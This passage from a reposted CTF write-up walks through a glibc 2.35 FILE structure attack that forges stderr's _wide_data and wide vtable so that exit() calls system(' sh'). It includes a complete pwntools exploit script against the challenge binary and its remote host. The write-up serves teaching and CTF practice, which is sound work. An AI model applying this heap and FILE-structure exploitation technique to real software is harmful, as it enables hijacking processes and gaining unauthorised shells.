  __setbuf = 0x7ffff7e1e620 <_IO_new_file_setbuf>,
  __sync = 0x7ffff7e1a720 <__GI__IO_wfile_sync>,
  __doallocate = 0x7ffff7e13f10 <_IO_wfile_doallocate>,
  __read = 0x7ffff7e1f9b0 <__GI__IO_file_read>,
  __write = 0x7ffff7e1ef40 <_IO_new_file_write>,
  __seek = 0x7ffff7e1e6f0 <__GI__IO_file_seek>,
  __close = 0x7ffff7e1e610 <__GI__IO_file_close>,
  __stat = 0x7ffff7e1ef30 <__GI__IO_file_stat>,
  __showmanyc = 0x7ffff7e234a0 <_IO_default_showmanyc>,
  __imbue = 0x7ffff7e234b0 <_IO_default_imbue>
}

Let’s take a look at the implementation of one of its functions, _IO_wfile_overflow (this is the path that was discovered by both kylebot and roderick01).

wint_t
_IO_wfile_overflow (FILE *f, wint_t wch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return WEOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
      /* Allocate a buffer if needed. */
      if (f->_wide_data->_IO_write_base == 0)
	{
	  _IO_wdoallocbuf (f);
	  ...
	}
      ...
}

void
_IO_wdoallocbuf (FILE *fp)
{
  if (fp->_wide_data->_IO_buf_base)
    return;
  if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
      ...
}

#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)

#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)

#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)

#define _IO_WIDE_JUMPS(THIS) \
  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

As you can see above, WJUMP0 performs no validation of whether the _wide_vtable pointer lies in the correct region. This means that if we can forge a fake wide vtable and trigger the macro call (WJUMP0), we can jump to any address that we want, just like in old glibc.

Also notice that the vtable used by _IO_WIDE_JUMPS is taken from fp->_wide_data->_wide_vtable. If you revisit the stdout fields that we inspected in gdb, you can see that the FILE has a field called _wide_data, which points to another struct, _IO_wide_data_1. Below are the fields stored in _IO_wide_data_1 printed via gdb:

gef➤  print _IO_wide_data_1
$10 = {
  _IO_read_ptr = 0x0,
  _IO_read_end = 0x0,
  _IO_read_base = 0x0,
  _IO_write_base = 0x0,
  _IO_write_ptr = 0x0,
  _IO_write_end = 0x0,

...

  _shortbuf = L"",
  _wide_vtable = 0x7ffff7faa0c0 <__GI__IO_wfile_jumps> <- This is the one that we can overwrite with our fake vtable
}

Based on that information, below is the call chain that we can achieve if we change the FILE vtable from _IO_file_jumps to _IO_wfile_jumps and trigger an __overflow call:

Assuming that we overwrite FILE->vtable from _IO_file_jumps to _IO_wfile_jumps, when the binary tries to call
_IO_OVERFLOW (fp, EOF), the chain would be:

_IO_OVERFLOW (fp, EOF)
|_ JUMP1 (__overflow, fp, EOF)
   |_ (_IO_JUMPS_FUNC(fp)->__overflow) (fp, EOF)
      |_ ((IO_validate_vtable (_IO_JUMPS_FILE_plus (fp)))->__overflow) (fp, EOF) <- Because we overwrite it to point to _IO_wfile_jumps, it will call _IO_wfile_overflow instead of _IO_new_file_overflow. This is still valid because its location is still in the correct region
         |_ _IO_wfile_overflow(fp, EOF)
            |_ _IO_wdoallocbuf(fp)
               |_ _IO_WDOALLOCATE(fp)
                  |_ WJUMP0 (__doallocate, fp)
                     |_ (_IO_WIDE_JUMPS_FUNC(fp)->__doallocate) (fp)
                         |_ (_IO_WIDE_JUMPS(fp)->__doallocate) (fp) <- No Validation #profit :D

Note that to achieve this call, there are some constraints that we need to fulfill:

  • In _IO_wfile_overflow, we need to bypass these checks to continue calling _IO_wdoallocbuf:
    • if (f->_flags & _IO_NO_WRITES) need to return False.
    • if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0) need to return True.
    • if (f->_wide_data->_IO_write_base == 0) need to return True.
  • In _IO_wdoallocbuf, we need to bypass these checks to continue calling _IO_WDOALLOCATE:
    • if (fp->_wide_data->_IO_buf_base) need to return False.
    • if (!(fp->_flags & _IO_UNBUFFERED)) need to return True.
      • _IO_UNBUFFERED is 0x0002, which means _flags & _IO_UNBUFFERED == 0 needs to hold.
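
The _flags checks above are plain bit tests, so a candidate _flags value can be vetted offline before it is written into the FILE. Below is a minimal sketch: the three bit values come from glibc's libio.h, while the helper name flags_reach_wdoallocate and the sample value 0xfbad2887 are assumptions chosen only for illustration.

```python
# Flag bits from glibc's libio/libio.h
_IO_UNBUFFERED        = 0x0002
_IO_NO_WRITES         = 0x0008
_IO_CURRENTLY_PUTTING = 0x0800


def flags_reach_wdoallocate(flags: int) -> bool:
    """Return True if `flags` passes every _flags test listed above.

    Only the _flags bits are modelled. The _wide_data pointer checks
    (_IO_write_base == 0 and _IO_buf_base == 0) must be arranged separately.
    """
    if flags & _IO_NO_WRITES:            # _IO_wfile_overflow returns early
        return False
    if flags & _IO_CURRENTLY_PUTTING:    # _IO_wdoallocbuf is never reached
        return False
    if flags & _IO_UNBUFFERED:           # _IO_wdoallocbuf skips _IO_WDOALLOCATE
        return False
    return True


print(flags_reach_wdoallocate(0x0))         # True: all three bits are clear
print(flags_reach_wdoallocate(0xfbad2887))  # False: _IO_CURRENTLY_PUTTING is set
```

Any value that keeps these three bits clear is acceptable, which leaves plenty of room to place printable command bytes in _flags.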

If those constraints are fulfilled, execution jumps to the pointer stored in fp->_wide_data->_wide_vtable->__doallocate, with rdi pointing to the FILE itself (fp).

Finally, this is a path that we can take to do a FILE Structure Attack in glibc 2.35. For example, we can create a fake _wide_vtable whose __doallocate entry points to system, which means that calling _IO_WDOALLOCATE(fp) will execute system(fp). And if we forge the fp content so that it executes sh, we will get a shell 😀

But how can we trigger _IO_OVERFLOW in the first place? We can abuse the third menu of the binary, which is exit. You can read the details of the chain in my previous article about FILE Structure Attack, but the tl;dr is that when we call exit, the binary goes through a call chain like this:

exit
|_ _IO_cleanup
   |_ _IO_flush_all_lockp
      Iterate list of available files (stderr->stdout->stdin), and on each iteration it will call:
      |_ _IO_OVERFLOW (fp, EOF)

The constraint to call _IO_OVERFLOW is the first branch of the if condition in the _IO_flush_all_lockp code:

  • fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base
    • So, we need to set _mode to 0, and make _IO_write_ptr > _IO_write_base.
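
That branch can be modelled in a couple of lines to sanity-check candidate field values. This is only a sketch of the single branch quoted above (the real condition in _IO_flush_all_lockp also has a wide-oriented alternative that is not modelled here), and should_call_overflow is a made-up name.

```python
def should_call_overflow(mode: int, write_ptr: int, write_base: int) -> bool:
    """Model of `fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base`."""
    return mode <= 0 and write_ptr > write_base


# Example values that satisfy the constraint
print(should_call_overflow(mode=0, write_ptr=1, write_base=0))  # True
# A stream whose put area is empty is skipped
print(should_call_overflow(mode=0, write_ptr=0, write_base=0))  # False
```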

Because exit iterates over all available files, I chose to use the OOB write bug to overwrite the file structure of stderr. To summarize, this is what we need to do to the stderr file structure to gain RCE upon exit:

  • Create a fake _wide_vtable.
    • I decided to put it at chunk_addr+0x100. Note that our chunk_addr is at libc_base - 0xf7ff0.
    • __doallocate offset is 0x68, so fill chunk_addr+0x100+0x68 with system address.
  • Create a fake _wide_data.
    • I decided to put it in chunk_addr.
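    • Set chunk_addr->_IO_write_base (which is at chunk_addr+0x18) to 0.
    • Set chunk_addr->_IO_buf_base (which is at chunk_addr+0x30) to 0.
      • struct _IO_wide_data has no _flags field, so these offsets are 8 bytes lower than those of the same-named fields in FILE (0x20 and 0x38). The chunk was freshly mmapped and should already be zero-filled, so these two writes are only a safeguard.
    • Set chunk_addr->_wide_vtable (which is at chunk_addr+0xe0) to chunk_addr+0x100 (which is our fake _wide_vtable).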
  • Set the stderr->_flags to the correct value. Some important notes:
    • Remember that because we turn _wide_vtable->__doallocate(stderr) into system(stderr), the command executed by system starts at stderr->_flags (because _flags is at &stderr+0x0). We need to ensure that _flags still fulfills the constraints, yet is able to execute our command. Some tricks that can be used:
      • kylebot set _flags to 0x3b01010101010101, and _IO_read_ptr to /bin/sh\x00.
        • 0x3b01010101010101 is equivalent to \x01\x01\x01\x01\x01\x01\x01; in memory, so the final call will be system('\x01\x01\x01\x01\x01\x01\x01;/bin/sh'), which triggers a shell while all of the if-condition constraints are fulfilled.
      • roderick01 set _flags to "  sh" (with two spaces in front). This still fulfills the constraints, and will call system("  sh") at the end.
  • Set stderr->_IO_write_base to 0, and stderr->_IO_write_ptr to 1.
    • So that when we call exit, _IO_flush_all_lockp will call _IO_OVERFLOW(stderr, EOF).
  • Set the stderr->vtable to _IO_wfile_jumps.
    • So that when _IO_OVERFLOW(stderr, EOF) is called, it will call _IO_wfile_overflow instead of _IO_new_file_overflow.
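
To see why both _flags tricks end up running a shell, it helps to look at the start of the FILE the way system() does: as a C string that stops at the first NUL byte. The sketch below uses only the struct module. c_string is a hypothetical helper, and the layout assumes that _IO_read_ptr directly follows the 8-byte slot holding _flags (offset 0x8).

```python
import struct


def c_string(memory: bytes) -> bytes:
    """Return the bytes a C function would read: everything before the first NUL."""
    return memory.split(b"\x00", 1)[0]


# kylebot's variant: _flags = 0x3b01010101010101, _IO_read_ptr = b"/bin/sh\x00"
kylebot = struct.pack("<Q", 0x3B01010101010101) + b"/bin/sh\x00"

# roderick01's variant: _flags = b"  sh", padded with NULs to 8 bytes
roderick = b"  sh".ljust(8, b"\x00")

print(c_string(kylebot))   # b'\x01\x01\x01\x01\x01\x01\x01;/bin/sh'
print(c_string(roderick))  # b'  sh'
```

In the first variant the shell fails on the unknown command made of \x01 bytes and then runs /bin/sh after the semicolon. In the second, the leading spaces are ignored and sh is executed directly.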

And after we successfully rewrite the stderr file structure, if we call exit, we should be able to get a shell!

Finally, let’s continue our script to implement those actions. First, create a fake _wide_vtable.

# Setup fake _wide_vtable
fake_wide_vtable_addr                         = chunk_addr + 0x100
fake_wide_vtable_doallocate_offset_from_chunk = (fake_wide_vtable_addr - chunk_addr) + 0x68
system_addr                                   = libc.symbols['system']
for i, num in enumerate(p64(system_addr)):
    edit(r, fake_wide_vtable_doallocate_offset_from_chunk+i, num)
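
The same byte-at-a-time loop recurs in every later step, because the edit primitive writes a single byte per call. A small helper could express that once. This is only a sketch: write_bytes is a hypothetical name, and edit_fn stands in for the script's edit(r, offset, val).

```python
from typing import Callable


def write_bytes(edit_fn: Callable[[int, int], None], offset: int, data: bytes) -> None:
    """Write `data` starting at `offset`, one byte per call to `edit_fn`."""
    for i, value in enumerate(data):
        edit_fn(offset + i, value)


# Dry run against a recorder instead of the real target
calls = []
write_bytes(lambda off, val: calls.append((off, val)), 0x168, (0x1234).to_bytes(8, "little"))
print(calls[:2])  # [(360, 52), (361, 18)]
```

In the solver, this would be called as write_bytes(lambda off, val: edit(r, off, val), fake_wide_vtable_doallocate_offset_from_chunk, p64(system_addr)).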

Now, create a fake _wide_data.

# Setup fake _wide_data
# Offsets are those of struct _IO_wide_data, which has no _flags field:
# _IO_write_base = 0x18, _IO_buf_base = 0x30, _wide_vtable = 0xe0
fake_wide_data_addr                            = chunk_addr
fake_wide_data_IO_write_base_offset_from_chunk = (fake_wide_data_addr - chunk_addr)+0x18
fake_wide_data_IO_buf_base_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0x30
fake_wide_data_wide_vtable_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0xe0
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_write_base to 0
    edit(r, fake_wide_data_IO_write_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_buf_base to 0
    edit(r, fake_wide_data_IO_buf_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(fake_wide_vtable_addr)): # Set _wide_data->_wide_vtable to fake_wide_vtable_addr
    edit(r, fake_wide_data_wide_vtable_offset_from_chunk+i, num)

Now, forge the stderr.

# Forge stderr
fake_stderr                = FileStructure(0)
fake_stderr.flags          = u64(b'  sh\x00\x00\x00\x00')
fake_stderr._IO_write_base = 0
fake_stderr._IO_write_ptr  = 1 # _IO_write_ptr > _IO_write_base
fake_stderr._wide_data     = fake_wide_data_addr
fake_stderr.vtable         = libc.symbols['_IO_wfile_jumps']
fake_stderr_bytes = bytes(fake_stderr)
for i, num in enumerate(fake_stderr_bytes):
    edit(r, stderr_offset_from_chunk+i, num)

Exit, and profit 😀

# Exit and profit :D
exit_binary(r)

 


Below is the full script for my solver:

import warnings

from pwn import *

exe = ELF("cursed_grimoires_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

remote_url = "157.230.242.192"
remote_port = 30472
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = process([exe.path], env={})
        if args.PLT_DEBUG:
            gdb.attach(r, gdbscript=gdbscript)
            pause()
    else:
        r = remote(remote_url, remote_port)

    return r

r = conn()

def create(r, size, content):
    r.sendlineafter(b'=> ', b'1')
    r.sendlineafter(b'=> ', str(size).encode())
    r.sendlineafter(b'=> ', content)

def edit(r, offset, val):
    r.sendlineafter(b'=> ', b'2')
    r.sendlineafter(b'=> ', str(offset).encode())
    r.sendlineafter(b'=> ', bytes([val]))

def exit_binary(r):
    r.sendlineafter(b'=> ', b'3')
    r.interactive()

# Create a big chunk, so that our chunk is located on the new page
# created by mmap (To be precise, at libc_base-0xf7ff0)
chunk_size      = 1000000
offset_to_libc  = 0xf7ff0
create(r, chunk_size, b'a'*8)

'''
Leak libc base via stdout
'''
# Prepare the correct offset for stdout and stderr
stdout_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stdout_']
stderr_offset_from_chunk = offset_to_libc + libc.symbols['_IO_2_1_stderr_']
log.info(f'Stdout offset: {hex(stdout_offset_from_chunk)}')
log.info(f'Stderr offset: {hex(stderr_offset_from_chunk)}')

# Overwrite stdout->_flags to 0x1800
flags_offset = 0x0  # stdout->_flags  = &stdout + 0x0
flags = p32(0x1800)
for i in range(len(flags)):
    edit(r, stdout_offset_from_chunk+flags_offset+i, flags[i])

# Overwrite the LSB of stdout->_IO_write_ptr so that it is larger than _IO_write_base
write_ptr_offset = 0x28 # stdout->_IO_write_ptr = &stdout + 0x28
write_ptr_lsb    = 0x50 # You can choose any value. I choose 0x50
edit(r, stdout_offset_from_chunk+write_ptr_offset, write_ptr_lsb)

# Now, when the binary calls menu() (which will call puts()),
# it will leak a libc address, which is the address of _IO_stdfile_1_lock
out = r.recv(16)[5:]
leaked_libc = u64(out[:8])
log.info(f'Leaked libc  : {hex(leaked_libc)}')
libc_base = leaked_libc-libc.symbols['_IO_stdfile_1_lock']
log.info(f'Libc base    : {hex(libc_base)}')
libc.address = libc_base
chunk_addr = libc_base - 0xf7ff0
log.info(f'Chunk addr   : {hex(chunk_addr)}')

'''
Getting RIP Control via exit through stderr
'''
# Setup fake _wide_vtable
fake_wide_vtable_addr                         = chunk_addr + 0x100
fake_wide_vtable_doallocate_offset_from_chunk = (fake_wide_vtable_addr - chunk_addr) + 0x68
system_addr                                   = libc.symbols['system']
for i, num in enumerate(p64(system_addr)):
    edit(r, fake_wide_vtable_doallocate_offset_from_chunk+i, num)

# Setup fake _wide_data
# Offsets are those of struct _IO_wide_data, which has no _flags field:
# _IO_write_base = 0x18, _IO_buf_base = 0x30, _wide_vtable = 0xe0
fake_wide_data_addr                            = chunk_addr
fake_wide_data_IO_write_base_offset_from_chunk = (fake_wide_data_addr - chunk_addr)+0x18
fake_wide_data_IO_buf_base_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0x30
fake_wide_data_wide_vtable_offset_from_chunk   = (fake_wide_data_addr - chunk_addr)+0xe0
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_write_base to 0
    edit(r, fake_wide_data_IO_write_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(0)): # Set _wide_data->_IO_buf_base to 0
    edit(r, fake_wide_data_IO_buf_base_offset_from_chunk+i, num)
for i, num in enumerate(p64(fake_wide_vtable_addr)): # Set _wide_data->_wide_vtable to fake_wide_vtable_addr
    edit(r, fake_wide_data_wide_vtable_offset_from_chunk+i, num)

# Forge stderr
fake_stderr                = FileStructure(0)
fake_stderr.flags          = u64(b'  sh\x00\x00\x00\x00')
fake_stderr._IO_write_base = 0
fake_stderr._IO_write_ptr  = 1 # _IO_write_ptr > _IO_write_base
fake_stderr._wide_data     = fake_wide_data_addr
fake_stderr.vtable         = libc.symbols['_IO_wfile_jumps']
fake_stderr_bytes = bytes(fake_stderr)
for i, num in enumerate(fake_stderr_bytes):
    edit(r, stderr_offset_from_chunk+i, num)

# Exit and profit :D
exit_binary(r)

 

Originally published by Chovid99: STACK the Flags CTF 2022

Copyright notice: posted by admin on December 8, 2022, at 9:10 PM.
When reposting, please credit: STACK the Flags CTF 2022 | CTF导航
